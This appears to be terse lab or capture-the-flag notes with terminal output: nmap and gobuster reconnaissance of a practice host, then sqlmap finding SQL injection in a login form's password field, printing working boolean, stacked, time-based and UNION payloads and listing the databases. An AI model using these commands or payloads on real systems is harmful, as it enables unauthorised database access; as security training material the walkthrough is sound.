kali@kali:~$ nmap -sC -sV 10.10.10.20
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 22:40 EDT
Nmap scan report for 10.10.10.20
Host is up (0.16s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!


kali@kali:~/go/bin$ sudo nmap -sU -sT -T4 --max-retries 0 10.10.10.20
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 22:51 EDT
Warning: 10.10.10.20 giving up on port because retransmission cap hit (0).
Warning: 10.10.10.20 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.20
Host is up (0.15s latency).
Not shown: 990 open|filtered ports, 761 filtered ports, 247 closed ports
PORT    STATE SERVICE
80/tcp  open  http
161/udp open  snmp




kali@kali:~/go/bin$ ./gobuster dir --url=http://10.10.10.20 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.20
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/04 22:43:25 Starting gobuster
===============================================================
/dev (Status: 301)




it's a login page


burp proxy for 127.0.0.1:8080, and set the browser do the same, interception is on, and we get the request for post on /dev/login.php, save to a file 123


name=123&pass=123kali@kali:~/Downloads$ sqlmap -r 123 -p pass --dbms mysql --level 4 --risk 3 --dbs 
        ___
       __H__                                                                                                      
 ___ ___[.]_____ ___ ___  {1.4.6#stable}                                                                          
|_ -| . ["]     | .'| . |                                                                                         
|___|_  [.]_|_|_|__,|  _|                                                                                         
      |_|V...       |_|   http://sqlmap.org                                                                       

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:49:33 /2020-07-04/

[23:49:33] [INFO] parsing HTTP request from '123'
[23:49:33] [INFO] testing connection to the target URL
[23:49:34] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
[23:49:39] [INFO] testing if the target URL content is stable
[23:49:39] [INFO] target URL content is stable
[23:49:40] [WARNING] heuristic (basic) test shows that POST parameter 'pass' might not be injectable
[23:49:40] [INFO] testing for SQL injection on POST parameter 'pass'
[23:49:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:50:00] [INFO] POST parameter 'pass' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[23:50:00] [INFO] testing 'Generic inline queries'
[23:50:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                                                             
[23:50:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:50:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:50:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:50:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                                                                
[23:50:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:50:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:50:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:50:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[23:50:03] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[23:50:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[23:50:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[23:50:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[23:50:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[23:50:04] [INFO] testing 'MySQL inline queries'
[23:50:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:50:15] [INFO] POST parameter 'pass' appears to be 'MySQL >= 5.0.12 stacked queries (comment)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (4) value? [Y/n] 
[23:50:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:50:37] [INFO] POST parameter 'pass' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[23:50:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:50:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:50:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:50:38] [INFO] target URL appears to have 2 columns in query
[23:50:39] [INFO] POST parameter 'pass' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[23:50:39] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'pass' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 125 HTTP(s) requests:
---
Parameter: pass (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: name=123&pass=-5923' OR 5449=5449-- CRex

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: name=123&pass=123';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=123&pass=123' AND (SELECT 5415 FROM (SELECT(SLEEP(5)))UFVP)-- LnLv

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: name=123&pass=123' UNION ALL SELECT CONCAT(0x716a7a7a71,0x7a5a4943796f616762657a795567494262796b7a55695a45554f6f4357776a6d526e4d6c69484765,0x716b627671),NULL-- -
---
[23:51:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[23:51:01] [INFO] fetching database names
available databases [4]:
[*] dev
[*] information_schema
[*] mysql
[*] performance_schema




